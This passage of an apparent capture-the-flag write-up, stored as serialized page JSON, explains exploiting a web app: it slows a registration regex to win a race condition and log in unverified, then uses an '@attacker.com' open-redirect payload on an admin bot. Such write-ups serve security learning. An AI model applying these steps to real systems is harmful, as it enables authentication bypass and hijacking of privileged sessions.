",{"type":32,"tag":78,"props":1235,"children":1236},{"style":471},[1237],{"type":37,"value":624},{"type":32,"tag":78,"props":1239,"children":1240},{"style":498},[1241],{"type":37,"value":549},{"type":32,"tag":78,"props":1243,"children":1244},{"style":504},[1245],{"type":37,"value":1246},"users",{"type":32,"tag":78,"props":1248,"children":1249},{"style":498},[1250],{"type":37,"value":1251},"\"\n",{"type":32,"tag":78,"props":1253,"children":1254},{"class":80,"line":99},[1255,1261,1266,1271,1275,1280,1284,1289,1293,1298],{"type":32,"tag":78,"props":1256,"children":1258},{"style":1257},"--shiki-default:#B8A965",[1259],{"type":37,"value":1260},"    id",{"type":32,"tag":78,"props":1262,"children":1263},{"style":471},[1264],{"type":37,"value":1265}," =",{"type":32,"tag":78,"props":1267,"children":1268},{"style":607},[1269],{"type":37,"value":1270}," 
Column",{"type":32,"tag":78,"props":1272,"children":1273},{"style":471},[1274],{"type":37,"value":495},{"type":32,"tag":78,"props":1276,"children":1277},{"style":607},[1278],{"type":37,"value":1279},"Integer",{"type":32,"tag":78,"props":1281,"children":1282},{"style":471},[1283],{"type":37,"value":516},{"type":32,"tag":78,"props":1285,"children":1286},{"style":519},[1287],{"type":37,"value":1288}," primary_key",{"type":32,"tag":78,"props":1290,"children":1291},{"style":471},[1292],{"type":37,"value":624},{"type":32,"tag":78,"props":1294,"children":1295},{"style":833},[1296],{"type":37,"value":1297},"True",{"type":32,"tag":78,"props":1299,"children":1300},{"style":471},[1301],{"type":37,"value":722},{"type":32,"tag":78,"props":1303,"children":1304},{"class":80,"line":108},[1305,1309,1313,1317,1321,1326],{"type":32,"tag":78,"props":1306,"children":1307},{"style":607},[1308],{"type":37,"value":974},{"type":32,"tag":78,"props":1310,"children":1311},{"style":471},[1312],{"type":37,"value":624},{"type":32,"tag":78,"props":1314,"children":1315},{"style":607},[1316],{"type":37,"value":1270},{"type":32,"tag":78,"props":1318,"children":1319},{"style":471},[1320],{"type":37,"value":495},{"type":32,"tag":78,"props":1322,"children":1323},{"style":607},[1324],{"type":37,"value":1325},"String",{"type":32,"tag":78,"props":1327,"children":1328},{"style":471},[1329],{"type":37,"value":722},{"type":32,"tag":78,"props":1331,"children":1332},{"class":80,"line":117},[1333,1338,1342,1346,1350,1355,1359,1364,1368,1372],{"type":32,"tag":78,"props":1334,"children":1335},{"style":607},[1336],{"type":37,"value":1337},"    verified 
",{"type":32,"tag":78,"props":1339,"children":1340},{"style":471},[1341],{"type":37,"value":624},{"type":32,"tag":78,"props":1343,"children":1344},{"style":607},[1345],{"type":37,"value":1270},{"type":32,"tag":78,"props":1347,"children":1348},{"style":471},[1349],{"type":37,"value":495},{"type":32,"tag":78,"props":1351,"children":1352},{"style":607},[1353],{"type":37,"value":1354},"Boolean",{"type":32,"tag":78,"props":1356,"children":1357},{"style":471},[1358],{"type":37,"value":516},{"type":32,"tag":78,"props":1360,"children":1361},{"style":519},[1362],{"type":37,"value":1363}," default",{"type":32,"tag":78,"props":1365,"children":1366},{"style":471},[1367],{"type":37,"value":624},{"type":32,"tag":78,"props":1369,"children":1370},{"style":833},[1371],{"type":37,"value":1297},{"type":32,"tag":78,"props":1373,"children":1374},{"style":471},[1375],{"type":37,"value":722},{"type":32,"tag":78,"props":1377,"children":1378},{"class":80,"line":126},[1379,1384,1388,1392,1396,1400],{"type":32,"tag":78,"props":1380,"children":1381},{"style":607},[1382],{"type":37,"value":1383},"    username ",{"type":32,"tag":78,"props":1385,"children":1386},{"style":471},[1387],{"type":37,"value":624},{"type":32,"tag":78,"props":1389,"children":1390},{"style":607},[1391],{"type":37,"value":1270},{"type":32,"tag":78,"props":1393,"children":1394},{"style":471},[1395],{"type":37,"value":495},{"type":32,"tag":78,"props":1397,"children":1398},{"style":607},[1399],{"type":37,"value":1325},{"type":32,"tag":78,"props":1401,"children":1402},{"style":471},[1403],{"type":37,"value":722},{"type":32,"tag":78,"props":1405,"children":1406},{"class":80,"line":135},[1407,1412,1416,1420,1424,1428],{"type":32,"tag":78,"props":1408,"children":1409},{"style":607},[1410],{"type":37,"value":1411},"    password 
",{"type":32,"tag":78,"props":1413,"children":1414},{"style":471},[1415],{"type":37,"value":624},{"type":32,"tag":78,"props":1417,"children":1418},{"style":607},[1419],{"type":37,"value":1270},{"type":32,"tag":78,"props":1421,"children":1422},{"style":471},[1423],{"type":37,"value":495},{"type":32,"tag":78,"props":1425,"children":1426},{"style":607},[1427],{"type":37,"value":1325},{"type":32,"tag":78,"props":1429,"children":1430},{"style":471},[1431],{"type":37,"value":722},{"type":32,"tag":78,"props":1433,"children":1434},{"class":80,"line":144},[1435,1440,1444,1448,1452,1456],{"type":32,"tag":78,"props":1436,"children":1437},{"style":607},[1438],{"type":37,"value":1439},"    email ",{"type":32,"tag":78,"props":1441,"children":1442},{"style":471},[1443],{"type":37,"value":624},{"type":32,"tag":78,"props":1445,"children":1446},{"style":607},[1447],{"type":37,"value":1270},{"type":32,"tag":78,"props":1449,"children":1450},{"style":471},[1451],{"type":37,"value":495},{"type":32,"tag":78,"props":1453,"children":1454},{"style":607},[1455],{"type":37,"value":1325},{"type":32,"tag":78,"props":1457,"children":1458},{"style":471},[1459],{"type":37,"value":722},{"type":32,"tag":46,"props":1461,"children":1462},{},[1463],{"type":37,"value":1464},"We know that the account is created first, and only then is the boolean set to False. 
We can therefore ask whether a race condition lets us log in during the window when the boolean is still True, which would give us a valid token.",{"type":32,"tag":46,"props":1466,"children":1467},{},[1468,1470,1476],{"type":37,"value":1469},"If we look at the EmailClient class, which is used to call the send-email function ",{"type":32,"tag":74,"props":1471,"children":1473},{"className":1472},[],[1474],{"type":37,"value":1475},"email_client.send_email",{"type":37,"value":485},{"type":32,"tag":63,"props":1478,"children":1479},{"lang":456},[1480],{"type":32,"tag":68,"props":1481,"children":1483},{"className":460,"code":1482,"language":456,"meta":7,"style":7},"email_client = EmailClient(email)\n",[1484],{"type":32,"tag":74,"props":1485,"children":1486},{"__ignoreMap":7},[1487],{"type":32,"tag":78,"props":1488,"children":1489},{"class":80,"line":81},[1490,1495,1499,1503,1507,1511],{"type":32,"tag":78,"props":1491,"children":1492},{"style":607},[1493],{"type":37,"value":1494},"email_client ",{"type":32,"tag":78,"props":1496,"children":1497},{"style":471},[1498],{"type":37,"value":624},{"type":32,"tag":78,"props":1500,"children":1501},{"style":607},[1502],{"type":37,"value":708},{"type":32,"tag":78,"props":1504,"children":1505},{"style":471},[1506],{"type":37,"value":495},{"type":32,"tag":78,"props":1508,"children":1509},{"style":607},[1510],{"type":37,"value":717},{"type":32,"tag":78,"props":1512,"children":1513},{"style":471},[1514],{"type":37,"value":722},{"type":32,"tag":46,"props":1516,"children":1517},{},[1518],{"type":37,"value":1519},"We can see that a regex is executed inside the constructor of the class.",{"type":32,"tag":63,"props":1521,"children":1522},{"lang":456},[1523],{"type":32,"tag":68,"props":1524,"children":1526},{"className":460,"code":1525,"language":456,"meta":7,"style":7},"class EmailClient:\n    def __init__(self, to_email):\n        email_verified = self.parse_email(to_email)\n[...]\n    def parse_email(self, 
email):\n        pattern = r\"^([0-9a-zA-Z]([-.\\w]*[0-9a-zA-Z])*@(([0-9a-zA-Z])+([-\\w]*[0-9a-zA-Z])*\\.)+[a-zA-Z]{2,9})$\"\n\n        try:\n            match = re.match(pattern, email)\n[...]\n",[1527],{"type":32,"tag":74,"props":1528,"children":1529},{"__ignoreMap":7},[1530,1546,1580,1619,1635,1667,1831,1838,1850,1897],{"type":32,"tag":78,"props":1531,"children":1532},{"class":80,"line":81},[1533,1537,1541],{"type":32,"tag":78,"props":1534,"children":1535},{"style":569},[1536],{"type":37,"value":1206},{"type":32,"tag":78,"props":1538,"children":1539},{"style":1209},[1540],{"type":37,"value":708},{"type":32,"tag":78,"props":1542,"children":1543},{"style":471},[1544],{"type":37,"value":1545},":\n",{"type":32,"tag":78,"props":1547,"children":1548},{"class":80,"line":90},[1549,1554,1559,1563,1567,1571,1576],{"type":32,"tag":78,"props":1550,"children":1551},{"style":569},[1552],{"type":37,"value":1553},"    def",{"type":32,"tag":78,"props":1555,"children":1556},{"style":1257},[1557],{"type":37,"value":1558}," __init__",{"type":32,"tag":78,"props":1560,"children":1561},{"style":471},[1562],{"type":37,"value":495},{"type":32,"tag":78,"props":1564,"children":1565},{"style":607},[1566],{"type":37,"value":952},{"type":32,"tag":78,"props":1568,"children":1569},{"style":471},[1570],{"type":37,"value":516},{"type":32,"tag":78,"props":1572,"children":1573},{"style":607},[1574],{"type":37,"value":1575}," to_email",{"type":32,"tag":78,"props":1577,"children":1578},{"style":471},[1579],{"type":37,"value":966},{"type":32,"tag":78,"props":1581,"children":1582},{"class":80,"line":99},[1583,1588,1592,1597,1601,1606,1610,1615],{"type":32,"tag":78,"props":1584,"children":1585},{"style":607},[1586],{"type":37,"value":1587},"        email_verified ",{"type":32,"tag":78,"props":1589,"children":1590},{"style":471},[1591],{"type":37,"value":624},{"type":32,"tag":78,"props":1593,"children":1594},{"style":593},[1595],{"type":37,"value":1596}," 
self",{"type":32,"tag":78,"props":1598,"children":1599},{"style":471},[1600],{"type":37,"value":485},{"type":32,"tag":78,"props":1602,"children":1603},{"style":607},[1604],{"type":37,"value":1605},"parse_email",{"type":32,"tag":78,"props":1607,"children":1608},{"style":471},[1609],{"type":37,"value":495},{"type":32,"tag":78,"props":1611,"children":1612},{"style":607},[1613],{"type":37,"value":1614},"to_email",{"type":32,"tag":78,"props":1616,"children":1617},{"style":471},[1618],{"type":37,"value":722},{"type":32,"tag":78,"props":1620,"children":1621},{"class":80,"line":108},[1622,1627,1631],{"type":32,"tag":78,"props":1623,"children":1624},{"style":471},[1625],{"type":37,"value":1626},"[",{"type":32,"tag":78,"props":1628,"children":1629},{"style":593},[1630],{"type":37,"value":596},{"type":32,"tag":78,"props":1632,"children":1633},{"style":471},[1634],{"type":37,"value":601},{"type":32,"tag":78,"props":1636,"children":1637},{"class":80,"line":117},[1638,1642,1647,1651,1655,1659,1663],{"type":32,"tag":78,"props":1639,"children":1640},{"style":569},[1641],{"type":37,"value":1553},{"type":32,"tag":78,"props":1643,"children":1644},{"style":477},[1645],{"type":37,"value":1646}," 
parse_email",{"type":32,"tag":78,"props":1648,"children":1649},{"style":471},[1650],{"type":37,"value":495},{"type":32,"tag":78,"props":1652,"children":1653},{"style":607},[1654],{"type":37,"value":952},{"type":32,"tag":78,"props":1656,"children":1657},{"style":471},[1658],{"type":37,"value":516},{"type":32,"tag":78,"props":1660,"children":1661},{"style":607},[1662],{"type":37,"value":665},{"type":32,"tag":78,"props":1664,"children":1665},{"style":471},[1666],{"type":37,"value":966},{"type":32,"tag":78,"props":1668,"children":1669},{"class":80,"line":126},[1670,1675,1679,1684,1688,1693,1697,1702,1706,1711,1716,1721,1726,1730,1734,1738,1743,1748,1752,1756,1761,1765,1770,1774,1778,1782,1786,1790,1794,1800,1804,1808,1813,1818,1822,1827],{"type":32,"tag":78,"props":1671,"children":1672},{"style":607},[1673],{"type":37,"value":1674},"        pattern ",{"type":32,"tag":78,"props":1676,"children":1677},{"style":471},[1678],{"type":37,"value":624},{"type":32,"tag":78,"props":1680,"children":1681},{"style":569},[1682],{"type":37,"value":1683}," 
r",{"type":32,"tag":78,"props":1685,"children":1686},{"style":498},[1687],{"type":37,"value":501},{"type":32,"tag":78,"props":1689,"children":1690},{"style":1257},[1691],{"type":37,"value":1692},"^",{"type":32,"tag":78,"props":1694,"children":1695},{"style":471},[1696],{"type":37,"value":495},{"type":32,"tag":78,"props":1698,"children":1699},{"style":593},[1700],{"type":37,"value":1701},"[0-9a-zA-Z]",{"type":32,"tag":78,"props":1703,"children":1704},{"style":471},[1705],{"type":37,"value":495},{"type":32,"tag":78,"props":1707,"children":1708},{"style":593},[1709],{"type":37,"value":1710},"[-.",{"type":32,"tag":78,"props":1712,"children":1713},{"style":1257},[1714],{"type":37,"value":1715},"\\w",{"type":32,"tag":78,"props":1717,"children":1718},{"style":593},[1719],{"type":37,"value":1720},"]",{"type":32,"tag":78,"props":1722,"children":1723},{"style":918},[1724],{"type":37,"value":1725},"*",{"type":32,"tag":78,"props":1727,"children":1728},{"style":593},[1729],{"type":37,"value":1701},{"type":32,"tag":78,"props":1731,"children":1732},{"style":471},[1733],{"type":37,"value":670},{"type":32,"tag":78,"props":1735,"children":1736},{"style":918},[1737],{"type":37,"value":1725},{"type":32,"tag":78,"props":1739,"children":1741},{"style":1740},"--shiki-default:#C4704F",[1742],{"type":37,"value":474},{"type":32,"tag":78,"props":1744,"children":1745},{"style":471},[1746],{"type":37,"value":1747},"((",{"type":32,"tag":78,"props":1749,"children":1750},{"style":593},[1751],{"type":37,"value":1701},{"type":32,"tag":78,"props":1753,"children":1754},{"style":471},[1755],{"type":37,"value":670},{"type":32,"tag":78,"props":1757,"children":1758},{"style":918},[1759],{"type":37,"value":1760},"+",{"type":32,"tag":78,"props":1762,"children":1763},{"style":471},[1764],{"type":37,"value":495},{"type":32,"tag":78,"props":1766,"children":1767},{"style":593},[1768],{"type":37,"value":1769},"[-",{"type":32,"tag":78,"props":1771,"children":1772},{"style":1257},[1773],{"type":37,"value":1715},{"
type":32,"tag":78,"props":1775,"children":1776},{"style":593},[1777],{"type":37,"value":1720},{"type":32,"tag":78,"props":1779,"children":1780},{"style":918},[1781],{"type":37,"value":1725},{"type":32,"tag":78,"props":1783,"children":1784},{"style":593},[1785],{"type":37,"value":1701},{"type":32,"tag":78,"props":1787,"children":1788},{"style":471},[1789],{"type":37,"value":670},{"type":32,"tag":78,"props":1791,"children":1792},{"style":918},[1793],{"type":37,"value":1725},{"type":32,"tag":78,"props":1795,"children":1797},{"style":1796},"--shiki-default:#E6CC77",[1798],{"type":37,"value":1799},"\\.",{"type":32,"tag":78,"props":1801,"children":1802},{"style":471},[1803],{"type":37,"value":670},{"type":32,"tag":78,"props":1805,"children":1806},{"style":918},[1807],{"type":37,"value":1760},{"type":32,"tag":78,"props":1809,"children":1810},{"style":593},[1811],{"type":37,"value":1812},"[a-zA-Z]",{"type":32,"tag":78,"props":1814,"children":1815},{"style":918},[1816],{"type":37,"value":1817},"{2,9}",{"type":32,"tag":78,"props":1819,"children":1820},{"style":471},[1821],{"type":37,"value":670},{"type":32,"tag":78,"props":1823,"children":1824},{"style":1257},[1825],{"type":37,"value":1826},"$",{"type":32,"tag":78,"props":1828,"children":1829},{"style":498},[1830],{"type":37,"value":1251},{"type":32,"tag":78,"props":1832,"children":1833},{"class":80,"line":135},[1834],{"type":32,"tag":78,"props":1835,"children":1836},{"emptyLinePlaceholder":157},[1837],{"type":37,"value":160},{"type":32,"tag":78,"props":1839,"children":1840},{"class":80,"line":144},[1841,1846],{"type":32,"tag":78,"props":1842,"children":1843},{"style":833},[1844],{"type":37,"value":1845},"        
try",{"type":32,"tag":78,"props":1847,"children":1848},{"style":471},[1849],{"type":37,"value":1545},{"type":32,"tag":78,"props":1851,"children":1852},{"class":80,"line":153},[1853,1858,1862,1867,1871,1876,1880,1885,1889,1893],{"type":32,"tag":78,"props":1854,"children":1855},{"style":607},[1856],{"type":37,"value":1857},"            match ",{"type":32,"tag":78,"props":1859,"children":1860},{"style":471},[1861],{"type":37,"value":624},{"type":32,"tag":78,"props":1863,"children":1864},{"style":607},[1865],{"type":37,"value":1866}," re",{"type":32,"tag":78,"props":1868,"children":1869},{"style":471},[1870],{"type":37,"value":485},{"type":32,"tag":78,"props":1872,"children":1873},{"style":607},[1874],{"type":37,"value":1875},"match",{"type":32,"tag":78,"props":1877,"children":1878},{"style":471},[1879],{"type":37,"value":495},{"type":32,"tag":78,"props":1881,"children":1882},{"style":607},[1883],{"type":37,"value":1884},"pattern",{"type":32,"tag":78,"props":1886,"children":1887},{"style":471},[1888],{"type":37,"value":516},{"type":32,"tag":78,"props":1890,"children":1891},{"style":607},[1892],{"type":37,"value":665},{"type":32,"tag":78,"props":1894,"children":1895},{"style":471},[1896],{"type":37,"value":722},{"type":32,"tag":78,"props":1898,"children":1899},{"class":80,"line":163},[1900,1904,1908],{"type":32,"tag":78,"props":1901,"children":1902},{"style":471},[1903],{"type":37,"value":1626},{"type":32,"tag":78,"props":1905,"children":1906},{"style":593},[1907],{"type":37,"value":596},{"type":32,"tag":78,"props":1909,"children":1910},{"style":471},[1911],{"type":37,"value":601},{"type":32,"tag":46,"props":1913,"children":1914},{},[1915],{"type":37,"value":1916},"The nested, overlapping quantifiers in this pattern make it prone to catastrophic backtracking, so we can check whether a long email address causes the server to hang.",{"type":32,"tag":46,"props":1918,"children":1919},{},[1920],{"type":37,"value":1921},"With a small test script and a 25-character email address, we can see that the function takes more than 2 seconds to 
execute.",{"type":32,"tag":63,"props":1923,"children":1924},{"lang":456},[1925],{"type":32,"tag":68,"props":1926,"children":1928},{"className":460,"code":1927,"language":456,"meta":7,"style":7},"# test.py\nimport datetime\nimport re\n\npattern = r\"^([0-9a-zA-Z]([-.\\w]*[0-9a-zA-Z])*@(([0-9a-zA-Z])+([-\\w]*[0-9a-zA-Z])*\\.)+[a-zA-Z]{2,9})$\"\ntime_now = datetime.datetime.now()\nemail = \"a\"*25\nre.match(pattern, email)\ntime_after = datetime.datetime.now()\nprint(time_after - time_now)\n",[1929],{"type":32,"tag":74,"props":1930,"children":1931},{"__ignoreMap":7},[1932,1940,1953,1965,1972,2120,2159,2192,2228,2264],{"type":32,"tag":78,"props":1933,"children":1934},{"class":80,"line":81},[1935],{"type":32,"tag":78,"props":1936,"children":1937},{"style":673},[1938],{"type":37,"value":1939},"# test.py\n",{"type":32,"tag":78,"props":1941,"children":1942},{"class":80,"line":90},[1943,1948],{"type":32,"tag":78,"props":1944,"children":1945},{"style":833},[1946],{"type":37,"value":1947},"import",{"type":32,"tag":78,"props":1949,"children":1950},{"style":607},[1951],{"type":37,"value":1952}," datetime\n",{"type":32,"tag":78,"props":1954,"children":1955},{"class":80,"line":99},[1956,1960],{"type":32,"tag":78,"props":1957,"children":1958},{"style":833},[1959],{"type":37,"value":1947},{"type":32,"tag":78,"props":1961,"children":1962},{"style":607},[1963],{"type":37,"value":1964}," re\n",{"type":32,"tag":78,"props":1966,"children":1967},{"class":80,"line":108},[1968],{"type":32,"tag":78,"props":1969,"children":1970},{"emptyLinePlaceholder":157},[1971],{"type":37,"value":160},{"type":32,"tag":78,"props":1973,"children":1974},{"class":80,"line":117},[1975,1980,1984,1988,1992,1996,2000,2004,2008,2012,2016,2020,2024,2028,2032,2036,2040,2044,2048,2052,2056,2060,2064,2068,2072,2076,2080,2084,2088,2092,2096,2100,2104,2108,2112,2116],{"type":32,"tag":78,"props":1976,"children":1977},{"style":607},[1978],{"type":37,"value":1979},"pattern 
",{"type":32,"tag":78,"props":1981,"children":1982},{"style":471},[1983],{"type":37,"value":624},{"type":32,"tag":78,"props":1985,"children":1986},{"style":569},[1987],{"type":37,"value":1683},{"type":32,"tag":78,"props":1989,"children":1990},{"style":498},[1991],{"type":37,"value":501},{"type":32,"tag":78,"props":1993,"children":1994},{"style":1257},[1995],{"type":37,"value":1692},{"type":32,"tag":78,"props":1997,"children":1998},{"style":471},[1999],{"type":37,"value":495},{"type":32,"tag":78,"props":2001,"children":2002},{"style":593},[2003],{"type":37,"value":1701},{"type":32,"tag":78,"props":2005,"children":2006},{"style":471},[2007],{"type":37,"value":495},{"type":32,"tag":78,"props":2009,"children":2010},{"style":593},[2011],{"type":37,"value":1710},{"type":32,"tag":78,"props":2013,"children":2014},{"style":1257},[2015],{"type":37,"value":1715},{"type":32,"tag":78,"props":2017,"children":2018},{"style":593},[2019],{"type":37,"value":1720},{"type":32,"tag":78,"props":2021,"children":2022},{"style":918},[2023],{"type":37,"value":1725},{"type":32,"tag":78,"props":2025,"children":2026},{"style":593},[2027],{"type":37,"value":1701},{"type":32,"tag":78,"props":2029,"children":2030},{"style":471},[2031],{"type":37,"value":670},{"type":32,"tag":78,"props":2033,"children":2034},{"style":918},[2035],{"type":37,"value":1725},{"type":32,"tag":78,"props":2037,"children":2038},{"style":1740},[2039],{"type":37,"value":474},{"type":32,"tag":78,"props":2041,"children":2042},{"style":471},[2043],{"type":37,"value":1747},{"type":32,"tag":78,"props":2045,"children":2046},{"style":593},[2047],{"type":37,"value":1701},{"type":32,"tag":78,"props":2049,"children":2050},{"style":471},[2051],{"type":37,"value":670},{"type":32,"tag":78,"props":2053,"children":2054},{"style":918},[2055],{"type":37,"value":1760},{"type":32,"tag":78,"props":2057,"children":2058},{"style":471},[2059],{"type":37,"value":495},{"type":32,"tag":78,"props":2061,"children":2062},{"style":593},[2063],{"type":37,"
value":1769},{"type":32,"tag":78,"props":2065,"children":2066},{"style":1257},[2067],{"type":37,"value":1715},{"type":32,"tag":78,"props":2069,"children":2070},{"style":593},[2071],{"type":37,"value":1720},{"type":32,"tag":78,"props":2073,"children":2074},{"style":918},[2075],{"type":37,"value":1725},{"type":32,"tag":78,"props":2077,"children":2078},{"style":593},[2079],{"type":37,"value":1701},{"type":32,"tag":78,"props":2081,"children":2082},{"style":471},[2083],{"type":37,"value":670},{"type":32,"tag":78,"props":2085,"children":2086},{"style":918},[2087],{"type":37,"value":1725},{"type":32,"tag":78,"props":2089,"children":2090},{"style":1796},[2091],{"type":37,"value":1799},{"type":32,"tag":78,"props":2093,"children":2094},{"style":471},[2095],{"type":37,"value":670},{"type":32,"tag":78,"props":2097,"children":2098},{"style":918},[2099],{"type":37,"value":1760},{"type":32,"tag":78,"props":2101,"children":2102},{"style":593},[2103],{"type":37,"value":1812},{"type":32,"tag":78,"props":2105,"children":2106},{"style":918},[2107],{"type":37,"value":1817},{"type":32,"tag":78,"props":2109,"children":2110},{"style":471},[2111],{"type":37,"value":670},{"type":32,"tag":78,"props":2113,"children":2114},{"style":1257},[2115],{"type":37,"value":1826},{"type":32,"tag":78,"props":2117,"children":2118},{"style":498},[2119],{"type":37,"value":1251},{"type":32,"tag":78,"props":2121,"children":2122},{"class":80,"line":126},[2123,2128,2132,2137,2141,2146,2150,2155],{"type":32,"tag":78,"props":2124,"children":2125},{"style":607},[2126],{"type":37,"value":2127},"time_now ",{"type":32,"tag":78,"props":2129,"children":2130},{"style":471},[2131],{"type":37,"value":624},{"type":32,"tag":78,"props":2133,"children":2134},{"style":607},[2135],{"type":37,"value":2136}," 
datetime",{"type":32,"tag":78,"props":2138,"children":2139},{"style":471},[2140],{"type":37,"value":485},{"type":32,"tag":78,"props":2142,"children":2143},{"style":607},[2144],{"type":37,"value":2145},"datetime",{"type":32,"tag":78,"props":2147,"children":2148},{"style":471},[2149],{"type":37,"value":485},{"type":32,"tag":78,"props":2151,"children":2152},{"style":607},[2153],{"type":37,"value":2154},"now",{"type":32,"tag":78,"props":2156,"children":2157},{"style":471},[2158],{"type":37,"value":1170},{"type":32,"tag":78,"props":2160,"children":2161},{"class":80,"line":135},[2162,2167,2171,2175,2179,2183,2187],{"type":32,"tag":78,"props":2163,"children":2164},{"style":607},[2165],{"type":37,"value":2166},"email ",{"type":32,"tag":78,"props":2168,"children":2169},{"style":471},[2170],{"type":37,"value":624},{"type":32,"tag":78,"props":2172,"children":2173},{"style":498},[2174],{"type":37,"value":549},{"type":32,"tag":78,"props":2176,"children":2177},{"style":504},[2178],{"type":37,"value":408},{"type":32,"tag":78,"props":2180,"children":2181},{"style":498},[2182],{"type":37,"value":501},{"type":32,"tag":78,"props":2184,"children":2185},{"style":569},[2186],{"type":37,"value":1725},{"type":32,"tag":78,"props":2188,"children":2189},{"style":918},[2190],{"type":37,"value":2191},"25\n",{"type":32,"tag":78,"props":2193,"children":2194},{"class":80,"line":144},[2195,2200,2204,2208,2212,2216,2220,2224],{"type":32,"tag":78,"props":2196,"children":2197},{"style":607},[2198],{"type":37,"value":2199},"re",{"type":32,"tag":78,"props":2201,"children":2202},{"style":471},[2203],{"type":37,"value":485},{"type":32,"tag":78,"props":2205,"children":2206},{"style":607},[2207],{"type":37,"value":1875},{"type":32,"tag":78,"props":2209,"children":2210},{"style":471},[2211],{"type":37,"value":495},{"type":32,"tag":78,"props":2213,"children":2214},{"style":607},[2215],{"type":37,"value":1884},{"type":32,"tag":78,"props":2217,"children":2218},{"style":471},[2219],{"type":37,"value":516},{"type
":32,"tag":78,"props":2221,"children":2222},{"style":607},[2223],{"type":37,"value":665},{"type":32,"tag":78,"props":2225,"children":2226},{"style":471},[2227],{"type":37,"value":722},{"type":32,"tag":78,"props":2229,"children":2230},{"class":80,"line":153},[2231,2236,2240,2244,2248,2252,2256,2260],{"type":32,"tag":78,"props":2232,"children":2233},{"style":607},[2234],{"type":37,"value":2235},"time_after ",{"type":32,"tag":78,"props":2237,"children":2238},{"style":471},[2239],{"type":37,"value":624},{"type":32,"tag":78,"props":2241,"children":2242},{"style":607},[2243],{"type":37,"value":2136},{"type":32,"tag":78,"props":2245,"children":2246},{"style":471},[2247],{"type":37,"value":485},{"type":32,"tag":78,"props":2249,"children":2250},{"style":607},[2251],{"type":37,"value":2145},{"type":32,"tag":78,"props":2253,"children":2254},{"style":471},[2255],{"type":37,"value":485},{"type":32,"tag":78,"props":2257,"children":2258},{"style":607},[2259],{"type":37,"value":2154},{"type":32,"tag":78,"props":2261,"children":2262},{"style":471},[2263],{"type":37,"value":1170},{"type":32,"tag":78,"props":2265,"children":2266},{"class":80,"line":163},[2267,2272,2276,2280,2285,2290],{"type":32,"tag":78,"props":2268,"children":2269},{"style":1257},[2270],{"type":37,"value":2271},"print",{"type":32,"tag":78,"props":2273,"children":2274},{"style":471},[2275],{"type":37,"value":495},{"type":32,"tag":78,"props":2277,"children":2278},{"style":607},[2279],{"type":37,"value":2235},{"type":32,"tag":78,"props":2281,"children":2282},{"style":569},[2283],{"type":37,"value":2284},"-",{"type":32,"tag":78,"props":2286,"children":2287},{"style":607},[2288],{"type":37,"value":2289}," time_now",{"type":32,"tag":78,"props":2291,"children":2292},{"style":471},[2293],{"type":37,"value":722},{"type":32,"tag":46,"props":2295,"children":2296},{},[2297],{"type":37,"value":2298},"You can find below the result of the execution of the 
script:",{"type":32,"tag":52,"props":2300,"children":2303},{"imgSrc":2301,":width":2302},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704226431/writeups/phantom-feed/test_regex.webp","350",[],{"type":32,"tag":46,"props":2305,"children":2306},{},[2307],{"type":37,"value":2308},"So we can confirm that if we register a user with a 25-character email address and then try to log in, we get a valid token. This works because the slow regex delays the update that sets the boolean to False, so it is still True when the login request is handled.",{"type":32,"tag":46,"props":2310,"children":2311},{},[2312],{"type":37,"value":2313},"With Burp, a race condition like this is easy to exploit: just select the \"Send group (separate connections)\" option.",{"type":32,"tag":52,"props":2315,"children":2317},{"imgSrc":2316},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704325504/writeups/phantom-feed/burp_race_condition.webp",[],{"type":32,"tag":46,"props":2319,"children":2320},{},[2321],{"type":37,"value":2322},"After that, we can see that the application sent us a JWT token during login. 
This token allows us to access routes protected by a middleware, which we will see in the next section.",{"type":32,"tag":52,"props":2324,"children":2326},{"imgSrc":2325},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704311577/writeups/phantom-feed/burp_login_token.webp",[],{"type":32,"tag":39,"props":2328,"children":2330},{"id":2329},"open-redirect",[2331],{"type":37,"value":2332},"Open Redirect",{"type":32,"tag":46,"props":2334,"children":2335},{},[2336],{"type":37,"value":2337},"So now we have a valid user token, we can call the route to invoke the bot.",{"type":32,"tag":46,"props":2339,"children":2340},{},[2341,2343,2349,2351,2357],{"type":37,"value":2342},"When examining the bot's declaration, it becomes apparent that the \"link\" parameter, which we have control over, is being used in an insecure manner and is susceptible to open redirection.\nIf we submit a payload like ",{"type":32,"tag":74,"props":2344,"children":2346},{"className":2345},[],[2347],{"type":37,"value":2348},"@attacker.com",{"type":37,"value":2350}," the bot will be redirected to ",{"type":32,"tag":74,"props":2352,"children":2354},{"className":2353},[],[2355],{"type":37,"value":2356},"attacker.com",{"type":37,"value":485},{"type":32,"tag":63,"props":2359,"children":2360},{"lang":456},[2361],{"type":32,"tag":68,"props":2362,"children":2364},{"className":460,"code":2363,"language":456,"meta":7,"style":7},"def bot_runner(link):\n    chrome_options = Options()\n [...]\n    client = webdriver.Chrome(options=chrome_options)\n    client.get(\"http://127.0.0.1:5000\")\n\n    token = create_jwt(1, \"administrator\")\n    cookie = {\n        \"name\": \"token\",\n        \"value\": token,\n        \"domain\": \"127.0.0.1\",\n        \"path\": \"/\",\n        \"expiry\": int((datetime.datetime.now() + datetime.timedelta(seconds=1800)).timestamp()),\n        \"secure\": False,\n        \"httpOnly\": True\n    }\n    client.add_cookie(cookie)\n\n    client.get(\"http://127.0.0.1:5000\" + link) # 
\u003C--- Here is the open redirect\n    time.sleep(10)\n    client.quit()\n",[2365],{"type":32,"tag":74,"props":2366,"children":2367},{"__ignoreMap":7},[2368,2393,2414,2430,2478,2516,2523,2570,2587,2626,2655,2692,2729,2834,2862,2887,2894,2923,2930,2979,3009],{"type":32,"tag":78,"props":2369,"children":2370},{"class":80,"line":81},[2371,2375,2380,2384,2389],{"type":32,"tag":78,"props":2372,"children":2373},{"style":569},[2374],{"type":37,"value":572},{"type":32,"tag":78,"props":2376,"children":2377},{"style":477},[2378],{"type":37,"value":2379}," bot_runner",{"type":32,"tag":78,"props":2381,"children":2382},{"style":471},[2383],{"type":37,"value":495},{"type":32,"tag":78,"props":2385,"children":2386},{"style":607},[2387],{"type":37,"value":2388},"link",{"type":32,"tag":78,"props":2390,"children":2391},{"style":471},[2392],{"type":37,"value":966},{"type":32,"tag":78,"props":2394,"children":2395},{"class":80,"line":90},[2396,2401,2405,2410],{"type":32,"tag":78,"props":2397,"children":2398},{"style":607},[2399],{"type":37,"value":2400},"    chrome_options 